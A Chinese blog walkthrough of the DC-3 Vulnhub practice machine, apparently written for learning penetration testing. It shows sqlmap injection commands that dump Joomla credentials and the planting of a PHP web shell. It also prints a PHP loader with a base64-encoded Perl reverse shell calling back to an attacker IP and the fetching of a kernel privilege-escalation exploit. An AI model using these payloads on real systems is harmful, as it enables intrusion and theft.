DC-3渗透详细教程

于 2023-10-19 18:16:53 发布
阅读量89 收藏
点赞数
文章标签: linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74950307/article/details/133932123
版权

靶机需要在与kali机在同一网段下:

Dc-3的桌面:

好吧,是一个登陆界面,而且还是一个ubunto

开始吧!

第一步——信息收集
1.kali的IP:192.168.13.128

2.arp-scan -l 扫描获得靶机的ip:192.168.13.131

3.看看靶机ip中正在使用的端口:

只有一个80端口,那么因该存在一个网站:

4.扫描该ip寻找他的相关域名:

可以看到域名为http://192.168.13.131 登录看看:

5.查看其下还有没有别的域名:

还不少嘞,其中发现

Index.php有东西,查看它:

哇塞,是一个新的登陆系统。

查看了资料才知道,Joomla 是一个流行的开源内容管理系统(CMS),用于构建和管理网站。它提供了强大的功能和灵活性,使用户能够创建各种类型的网站,包括博客、企业网站、在线商店等。

原来是一个插件,那么既然是插件那么就可能存在漏洞:

使用joomscan,查看以下他的版本号:

找到了他的版本号

6.查看是否存在漏洞:

竟然是sql注入漏洞

搜集到现在可以获得的信息:

kali的ip:192.168.13.128

靶机的ip:192.168.13.131

靶机ip下的域名:http://192.168.13.131以及域名下的域名

发现两个登陆系统,其中一个joolma存在sql注入漏洞

只发现一个端口号80端口的http服务

第二步——漏洞渗透

1.找到sql注入的源文件

找到后就可以将其内容添加到桌面:

提供了sqlmap的注入方法:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

将域名换为需要注入的域名:

sqlmap -u "http://192.168.13.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb                                         

        ___

成功得到库名:

继续注入,获得表名:

 sqlmap -u "http://192.168.13.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables

获得表名:

其中有一个user表,注入它获得列名:sqlmap -u "http://192.168.13.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T '#__users' --columns 

获得了列名,现在就是最后一步,获得字段值:sqlmap -u "http://192.168.13.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T '#__users' -C username,password --dump

得到用户名和密码: admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

但是密码并不是明文的,所以需要解密,该密码是一个哈希值,解码后的结果是:

Snoopy

2.进行登录查看:

里面有一个欢迎界面:

将其翻译:

这次,只有一个标志、一个入口点,没有线索。

要获取这个标志,显然你需要获取 root 权限。

如何成为 root 取决于你 - 当然也取决于系统。

祝你好运 - 希望你享受这个小挑战。 :-)

看来还是要提权才可以

3.查看资料得知需要找到一个文件上传的界面也是找到了:

需要写一个一句话木马进行提权:

木马位置:http://192.168.13.131/templates/beez3/shell.php

使用蚁剑进行连接:

连接后发现竟然不可以打开root的权限,也获得不了flag,还是要提权,那么就回到上一步:

查看资料后得知可以使用php提权,拿到他的shell

首先创建一个php文件:内容为:

<?php

function which($pr) {

$path = execute("which $pr");

return ($path ? $path : $pr);

}

function execute($cfe) {

$res = '';

if ($cfe) {

if(function_exists('exec')) {

@exec($cfe,$res);

$res = join("\n",$res);

}

elseif(function_exists('shell_exec')) {

$res = @shell_exec($cfe);

} elseif(function_exists('system')) {

@ob_start();

@system($cfe);

$res = @ob_get_contents();

@ob_end_clean();

} elseif(function_exists('passthru')) {

@ob_start();

@passthru($cfe);

$res = @ob_get_contents();

@ob_end_clean();

} elseif(@is_resource($f = @popen($cfe,"r"))) {

$res = '';

while(!@feof($f)) {

$res .= @fread($f,1024);

}

@pclose($f);

}

}

return $res;

}

function cf($fname,$text){

if($fp=@fopen($fname,'w')) {

@fputs($fp,@base64_decode($text));

@fclose($fp);

}

}

$yourip = "192.168.13.128";

$yourport = '4444';

$usedb = array('perl'=>'perl','c'=>'c');

$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".

"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".

"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".

"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".

"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".

"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".

"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

cf('/tmp/.bc',$back_connect);

$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");

?>

这个是一个在网上找的提权代码,将其保存

然后,在终端上开启本机端口4444:nc -lvnp 4444,访问

http://192.168.13.131/templates/beez3/webshell.php

执行交互代码:

python -c 'import pty;pty.spawn("/bin/bash")'

拿到了shell

7.查看其权限:

好吧,并不是root权限,还需提权。

linux系统下要尤其注意 /etc/passwd 和/etc/crontab两个文件 前者用来存储用户名 后者用来存储定时任务

 有时候都是解题的关键就是查看/etc/passwd

查看/etc/passwd:

并没有什么可以使用的

看下一个:

还是没有发现什么可以运用的内容

经过查阅资料得知,需要找到版本漏洞,利用版本漏洞进行提权:

那么就查看他的版本号:

7.在打开一个新的终端找他的漏洞(建议最大屏幕):

可以看到4.4.x中存在远程提权漏洞

找他的漏洞信息:


找到该信息,并且将其copy到桌面:

还提供了漏洞的使用方法,我简单一说:就是将39774.zip下载到本机,然后在利用靶机的漏洞进行下载本机的文件,最后执行

user@host:~/ebpf_mapfd_doubleput$ ./compile.sh

user@host:~/ebpf_mapfd_doubleput$ ./doubleput

实现本机的提权。

方法:首先根据最下方的网站进行下载到本机桌面,但是这个是无法下载的于是就在网络上找到一个文件,然后在传输到kali机上

,并进行解压:

现在需要打开本机终端开启本机的http服务端口

将exploit.tar的下载连接进行copy

http://192.168.13.128:8888/39772/exploit.tar

打开连接着dc-3的终端,远程下载它:

解压它:

进入ebpf_mapfd_doubleput_exploit/文件夹:

执行那两个文件:./compile.sh

和./doubleput

然后执行root权限功能,查看是否提权成功:

并使用whomai查看权限:

成功了,现在搜索flag的所在地:find /-name *flag*:

在root下发现flag:

成功了!!!!!!!!

备注:参考:DC-3靶场搭建及渗透实战详细过程(DC靶场系列)_金 帛的博客-CSDN博客

sup爱豆的笑容
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DC-3靶机渗透详细教程(附靶机链接)
bwt_D的博客
11-12 5576
靶机链接:https://pan.baidu.com/s/1Q3OuzI8mr-0G6AEagw_XBg 提取码:0na8 首先查看本机kali的ip地址:192.168.159.145 ifconfig 利用nmap扫描靶机IP nmap -sP 192.168.159.1/24 查看靶机mac地址 打开虚拟机设置,点击网络适配器——高级 根据靶机的mac地址匹配nmap的扫描结果确认靶机IP为192.168.159.141 使用nmap进行完整扫描 nmap -A 192.168.159.141
DC-3靶机渗透
weixin_45442394的博客
06-14 678
1 获取ip 开机前一直按shift或Esc键 ro recovery nomodeset改为quiet splash rw init=/bin/bash 更改后按F10 重启虚拟机 2 端口扫描 3 服务确认 4 网站目录扫描 5 查看页面 joomscan扫描 joomscan --url http://192.168.182.139 -ec 查看版本漏洞 查看文档 6 SQL注入 数据库名 sqlmap -u “http://192.168.182.139/index.php?o
DC-3 渗透测试
Darklord.W
04-13 1750
DC-3渗透测试 0x00实验环境 靶机:DC-3,IP地址:192.168.8.134 测试机:Kali,IP地址:192.168.8.128; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 主机发现 端口以及服务扫描(masscan以及nmap) 访问web 扫描web目录 得到: 如上图所示该网站由cms搭建,搜...
DC系列靶机渗透DC-3
weixin_52515588的博客
06-08 419
利用arp -scan -l扫描主机然后利用nmap查看开放的端口,如上图所示,80端口开放,那么接下来我们可以利用这个信息进行渗透访问一下80端口得到如上图所示的信息。然后使用whatweb对网站进行扫描,得到如下信息,可以知道网站是利用joomla部署的,那么我们就可以利用joomscan扫描 利用扫描工具扫出了网站后台,我们利用浏览器登录 如上图所示。我们在上述扫描结果中,能够看出来使用的joomla版本,接下来我们就可以利用msf查找漏洞 我们发现存在sql注入漏洞根据提示的路径,我们查看文件内容如
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
DC-4-Web渗透测试靶机
最新发布
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-3超声操作手册
03-25
DC-3超声操作手册 DC-3/DC-3T Diagnostic Ultrasound System Operator’s Manual
dc-sdk-examples:DC-SDK开发示例
05-11
"DC-SDK开发示例"是一个专门为开发者设计的项目,旨在帮助他们更好地理解和使用DC-SDK进行3D可视化开发。DC-SDK(可能是"Data Center SDK"或类似的缩写)是一个强大的工具集,用于构建基于Web的三维场景,特别是在...
渗透项目】靶机DC-3渗透过程
命运的旋律的博客
04-03 676
信息收集 主机发现 netdiscover -i eht0 -r 192.168.72.0/24 端口扫描 nmap -sS -sV -T4 -O -p- 192.168.72.155 目录扫描 gobuster dir -u http://192.168.72.155 -w /usr/share/dirb/wordlists/big.txt /.htpasswd (Statu...
DC-3靶机渗透测试
weixin_48991458的博客
11-23 4083
DC-3靶机渗透测试 环境搭建 kali-Linux(VMware) DC-3(VMware)靶机下载链接:https : //download.vulnhub.com/dc/DC-3-2.zip 这里有个坑,VMware用户要官网下的第二个镜像才能发现IP地址,这里官方也有说明,可以仔细看一下,这里也贴出来了 两台主机设为NAT模式,靶机需要改一下设置,默认是桥接 开始操作 先信息收集,两台主机在一个局域网下用netdiscover扫起来,在结合mac地址很快就能发现靶机IP 靶机mac地址在虚拟机设置
DC-3靶机 渗透测试
她叫常玉莹
07-18 2883
DC-3查看靶机mac地址获取IP地址NmapJooScansqlmapjohn上传Webshellnc反弹提权 DC-3只有一个目标获得root权限,拿到flag。 查看靶机mac地址 00:0C:29:0D:D3:78 获取IP地址 使用arp-scan扫描 得知靶机IP地址 192.168.0.104 Nmap 使用nmap扫描收集靶机信息 nmap -sV -p- 192.168.0.104 看到靶机开放了80端口,访问一下 http://192.168.0.104:80 在wappaly
【CyberSecurityLearning 72】DC系列之DC-3渗透测试(Joomla)
_Co1a
04-24 896
目录 DC-3靶机渗透测试 一、实验环境 二、渗透过程演示 1、信息搜集 2、SQL注入 3、登录后台 4、反弹shell 5、提权 总结: DC-3靶机渗透测试 DC-3也是一个黑盒测试,我们所能知道的只有它的MAC地址,我们可以根据它的MAC地址来确定IP地址 一、实验环境 实验环境: kali2021:192.168.3.155/24(桥接到vmnet0) 靶机环境DC-3(桥接到vmnet0,MAC地址:00:0C:29:2C:47:A4) ...
DC-3靶机渗透实战
0XAXSDD的博客
06-11 2672
DC-3靶机渗透 咱们速战速决!我尽量详细一点 打开靶机,nat模式,nmap主机发现,全扫描 80端口,joomla 框架,打开御剑扫描器扫到后台路径和README.txt文件 获得了版本 这个版本有个sql注入漏洞,直接找来payload验证一下 index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1) 确实存在注入漏洞
DC-3靶机的渗透学习
里丘~班诺的小屋
10-01 2783
一、靶机的环境搭配 攻击机(KALI):192.168.226.129 靶机(DC-1): 192.168.226.133(未知) 靶机地址:https://www.vulnhub.com/entry/dc-32,312/ 二、战前准备 2.1IP地址确认 命令:arp-scan -l扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) arp-scan命令: 是一个用来进行系统发现的ARP命令行扫描工具(可以发现本地网络中的隐藏设备)它可以构造并发送ARP请求到指定的IP地址,...
DC-3完整的渗透测试过程
weixin_51097397的博客
07-26 790
1.此次DC-3的渗透用到了如下几种工具的基础使用①arp-scan②namp③dirsearch⑤sqlmap⑥john⑦nc2.学到了如何用文件上传反弹shell?> #反弹shell脚本nc -lvvp 6666 #kali里nc开启监听3.学会用searchsploit搜索系统漏洞进行提权cat /proc/version #查看系统版本信息 cat /etc/issue。
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2445
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
DC-3渗透实战(详细过程)
tzyyyyyy的博客
10-16 2611
DC-3靶机渗透实战 利用各种姿势方法获取最终flag
matlab2021abuck dc-dc仿真实验教程
11-02
在MATLAB 2021a版本中,新的仿真实验教程“ABuck DC-DC”提供了学习和理解DC-DC变换器工作原理的示例。 该实验教程通过使用MATLAB的仿真环境来模拟和分析ABuck DC-DC变换器的性能。学习者将学会如何建立变换器的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值